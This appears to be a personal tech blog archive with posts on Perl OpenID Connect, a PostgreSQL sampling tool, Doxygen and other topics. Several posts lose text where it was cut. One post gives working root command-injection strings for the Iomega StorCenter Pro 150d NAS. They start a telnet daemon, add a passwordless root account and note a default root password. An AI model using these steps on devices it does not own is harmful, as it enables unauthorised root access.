Friday, November 29, 2013

OpenID Connect with Perl

Screenshot of Google consent screen
OpenID Connect is a new federated authentication and authorization protocol based on OAuth 2.0. The specification hasn't been finalized yet, but is expected soon.

Perl support is available through the OIDC::Lite module written by Ryo Ito. You can fetch it through CPAN or directly from Ryo's github repository.

The OIDC::Lite::Demo::Client package provides example code for a bunch of providers (as of this writing, there's support for Google, Facebook, Microsoft, Yahoo Japan, and the Japanese social networking site Mixi).

Monday, September 2, 2013

Hacking the Iomega StorCenter Pro 150d NAS

The StorCenter Pro 150d is a circa 2007 network-attached storage device (NAS) from Iomega which, frustratingly, does not provide shell access.

I had a problem with AFP (Apple Filing Protocol) not working but managed to get root access to fix it (turned out to be an orphaned pid file which wasn't being removed on boot, and which was preventing the service from starting).

The 150d has a vulnerability in how it handles email addresses within the alerts interface:

Screenshot of the StorCenter Pro 150d's Alerts Interface

You can append any arbitrary command between backticks and it will be dutifully executed as root when you click the "Send Test Mail" button.

It turns out that the StorCenter Pro 150d has a telnet daemon available through inetd. So all we need to do is start that, add a passwordless root account, and we can pop right in.,

Here are the commands that worked for me, but use them at your own risk. Click "Send Test Mail" after entering each one. The null@[] address is arbitrary -- any email address should work there.

UPDATE: See the comment from @George Kopf below. Apparently the default root password is simply the number '1', so you probably don't need to create the additional account. Just start the telnet daemon and try logging in as user 'root' with password '1'.

null@[]`mount -t devpts devpts /dev/pts >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`nohup /bin/inetd /etc/inetd.conf >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`echo 'root2::0:0:administrator:/mnt/0:/bin/sh' >>/etc/passwd`

If you have the /public share of your NAS mounted somewhere, you can watch the hacknas.log file to see any error messages.

Once done, you should be able to telnet in:

$ telnet nas
Connected to
Escape character is '^]'.

Linux 2.6.13 (obi) (pts/0)

nas login: root2

BusyBox v1.00 (BUILDTIME) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

-sh: can't access tty; job control turned off
~ #

System info:

# cat /proc/cpuinfo
processor : 0
cpu : e300
revision : 1.1 (pvr 8083 0011)
bogomips : 263.16
chipset : 8347E
Vendor : Freescale Inc.
Machine : mpc8347E sys
core clock : 396 MHz
bus  clock : 264 MHz
PVR : 0x80830011
SVR : 0x80520011
PLL setting : 0x6
Memory : 256 MB

For reference, here is the Iomega 150d manual.

Thanks to Jim Buzbee for identifying the alert vulnerability, and asysadm for his post on modifying the NFS export options.

Friday, March 15, 2013

Arsenal SAM7R Instruction Manual

The SAM7R-61 is a high quality Bulgarian-made AK47 rifle chambered in 7.62x39mm. It features a milled receiver and a chrome lined hammer-forged barrel.
Arsenal SAM7R-61
Arsenal SAM7R-61

  • 14mm muzzle threads
  • muzzle break
  • cleaning rod
  • bayonet lug
  • black polymer furniture
  • intermediate length buttstock
  • scope rail
  • one 10-round magazine
  • sling
  • oil bottle
  • cleaning kit

The SAM7R also comes in a California compliant model (the SAM7R-61C) that has a non-detachable magazine (you need to use their provided tool to release the mag).

Saturday, July 3, 2010

pg_sample: extract a sample dataset from a larger PostgreSQL database

pg_sample is a PostgreSQL utility for making smaller versions of large databases.

download pg_sample 0.01

When you have a relatively large database (tables with, say, millions or billions of rows), it can be difficult to generate smaller datasets to work with, especially if foreign keys are heavily used.

That's where this script comes in. It will create smaller instances of each table along with any additional rows needed to satisfy foreign key constraints (circular dependencies are supported).

The script's operation closely resembles that of pg_dump. For example, assuming we have a large database named largedb, a smaller version could be produced with:

createdb smalldb
pg_sample largedb | psql smalldb
The smalldb would then contain a subset of largedb's data.

Here are the command-line options (many of which mirror pg_dump):

Output only the data, not the schema (data definitions).

-E *encoding*
Use the specified character set encoding. If not specified, uses the
environment variable PGCLIENTENCODING, if defined; otherwise, uses
the encoding of the database.

-f *file*
Send output to the specified file. If omitted, standard output is

Drop the sample schema if it exists.

Don't delete the sample schema when the script finishes.

The maximum number of rows to initially copy from each table
(defaults to 100). Note that sample tables may end up with
significantly more rows in order to satisfy foreign key constraints.

Randomize the rows initially selected from each table. May
significantly increase the running time of the script.

The schema name to use for the sample database (defaults to

Turn on Perl DBI tracing. See the DBI module documentation for

Output status information to standard error.

The following options control the database connection parameters.

-h *host*
The host name to connect to. Defaults to the PGHOST environment
variable if not specified.

-p *port*
The database port to connect to. Defaults to the PGPORT environment
variable, if set; otherwise, the default port is used.

-U *username*
User name to connect as.

-W *password*
Password to connect with.
See also: pg_sample Github source repository

Sunday, May 9, 2010

ip2host 1.11 Release

A new release of ip2host is available. It's a small maintenance release incorporating changes from the Debian package maintainer. The source repository has also been moved to Github.


    Resolves IPs to hostnames in web server logs. This is a faster, drop-in
    replacement for the logresolve utility distributed with the Apache web


ip2host 1.11

  * Silence warnings thanks to Andrew McNaughton and Gunnar Wolf

Saturday, May 8, 2010

Installing Adobe AIR on 64-bit Ubuntu 9.10 Linux

Adobe AIR isn't currently available for 64-bit Linux, but they provide instructions on running the 32-bit version.

I've converted the Ubuntu instructions into this shell script:

From a terminal:

chmod a+rx
sudo ./
This worked for me on Ubuntu 9.10. Please let me know if you try it on other Ubuntu releases or otherwise have trouble with it.

Keywords: Installing Adobe AIR 64-bit Linux Ubuntu

Monday, October 12, 2009

Doxygen Example

Doxygen is a documentation system for use with many languages, including C++, C, Java, and Python.

First, install Doxygen. Using Ubuntu, I installed the package with:
$ apt-get install doxygen
Next. enter the source directory of a project you're working on and run:
$ doxygen -g
That will create a config file named Doxyfile in the current directory. You can customize it, but we'll accept the defaults for now.

Now begin writing your documentation. Here's an example of documenting a simple C++ program:

#include <iostream>

using namespace std;

* @brief Example class to demonstrate basic Doxygen usage
* @author MLA
* This is a simple class to demonstrate how Doxygen is used.
* It implements the Euclidean algorithm to compute the greatest
* common divisor of two numbers.

class Euclid {

* Compute the greatest common divisor of two integers.
* @param a first integer
* @param b second integer
* @return greatest common divisor of a and b
static const int gcd(const int a, const int b) {
if (0 == b) return a;
return gcd(b, a % b);

Finally, run doxygen, which will process the files and generate documentation in the html subdirectory:
$ doxygen
For more details, see the Doxygen homepage.